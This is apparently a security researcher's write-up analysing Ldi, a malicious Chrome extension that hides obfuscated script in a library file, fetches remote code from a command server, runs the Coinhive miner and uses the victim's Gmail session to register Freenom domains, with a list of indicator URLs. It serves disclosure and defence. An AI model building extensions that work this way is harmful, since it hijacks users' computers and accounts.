With Chrome being the most widely used web browser, attackers are starting to develop more advanced and malicious extensions for it every day. Whether it's impersonating popular extensions to deliver ads, hijacking search queries, or injecting the CoinHive browser miner, it is easy to see that malicious extensions are on the rise.

The extension we are going to look at today, called Ldi, takes it to the next level when it comes to malicious behavior. This is because it not only loads the Coinhive browser miner into a victim's browser and uses up all the CPU, but it also uses that victim's Gmail account to register free domains for the attackers using Freenom.

Promoted through scammy web sites

This extension was promoted through sites that displayed JavaScript alerts that continuously prompted you to install the extension. Though this site is no longer online, when a victim tried to close these alerts, the page would automatically open up the Chrome Web Store page for this extension. The Chrome Web Store page had little to no information and the description was "Wondering if your homepage is compatible with Mac? Check it with Ldi.". This extension has since been removed from the Chrome Web Store.

Chrome Web Store Page for LDI

When I dug down further and examined the source, though, it was obvious that this was not our garden variety unwanted extension.

Down the rabbit hole with the Ldi Extension

This extension consists of two JavaScript files called jarallax.min.js and bootstrap-filestyle.min.js as seen below.

Extension Folder

When I looked at the bootstrap-filestyle.min.js.script, I noticed that the extension developer added a section of obfuscated JavaScript to the end of the file that would execute whenever the browser started.

Obfuscated Code

The above JavaScript includes another obfuscated script, which is decoded and executed. Once executed, the script will connect to the URL http://fbcdnxy.net/fgelohmmdfimhmkbbicdngnpeoaidjkj/geo-location.json?cache=[timestmap]. This site will respond with another script that should be executed by the extension. This allows the extension to change its functionality whenever it wants by simply distributing a different script.

Currently, the remote script that is sent back to be executed is http://fbcdnxy.net/coobgpohoikkiipiblmjeljniedjpjpf/remote-postal-code.json. This script is the meat of the extension and will perform the various malicious activities such as loading Coinhive and registering domains through your Gmail account.

Once the browser starts, the above malicious script is executed and the fun begins.

First, the extension will connect to Facebook. While I did not see it do anything other than connect, there is quite a lot of code dedicated to Facebook, which could be for spreading the extension via Facebook Messenger. Unfortunately, I did not have the time to review that part of the code as much as I would have liked.

The extension now quickly loads Coinhive so that the browser begins mining Monero for the developer.

Chrome Task Manager showing the mining

After that, it begins the process of registering domain names using your Gmail account. First it connects to Freenom.com by POSTing to the the URL https://my.freenom.com/includes/domains/fn-available.php and checking if a random named domain and various TLDs are available to register. In this example, it was checking to see what was available for the string "jihafivagobumini".

Checking for Available Domains

Once it retrieves the available domain options, it adds each of those domains to a cart using the URL https://my.freenom.com/includes/domains/fn-additional.php.

Adding domain to the cart

When done adding the domains, it starts the checkout process, but needs an email address and information to register the domains under. To get the email address, it connects to the URL https://mail.google.com/mail/u/0/h/1pq68r75kdvdr/?v=lui to switch a logged in Gmail account to Gmail HTML view. This allows it to retrieve the email address of the logged in user. If a user is not logged into Gmail, then this extension is unable to register the domains.

It then connects to https://randomuser.me/api/0.4/?randomapi in order to generate random registration information that can be used during the checkout.

Random User for Checkout

Now that it has both an email address and random registration information, it finishes the checkout process at Freenom. In order to finish the registration process, though, the victim has to confirm their email address. The extension is clever, though, as it checks the Gmail account and automatically opens the verification link for you.

This will result in 4 domains being generated for the extension developer, but registered with the victims Gmail address. This is done each time the extension is installed in Chrome.

Registered Domains

Now that the domains have been registered it sends this information back to the C2 server at http://fbcdnxy.net/.

At this time it is not known what these domains are being used for, but they could easily be used to distribute malware, further spread the extension, or for phishing campaigns. Whatever they are used for, with each victim registering 4 domains for the developer, and some malicious extensions having hundreds, if not thousands, of users, this quickly adds up to a huge arsenal of domains for the attacker.

As I, and others, research this extension further I will update this article with any relevant information that is discovered.

IOCs

Network Traffic:

http://fbcdnxy.net/ http://fairexttrades.com/ https://my.freenom.com/ https://www.facebook.com/ https://coinhive.com/ https://mail.google.com/mail/ https://randomuser.me/

Hash: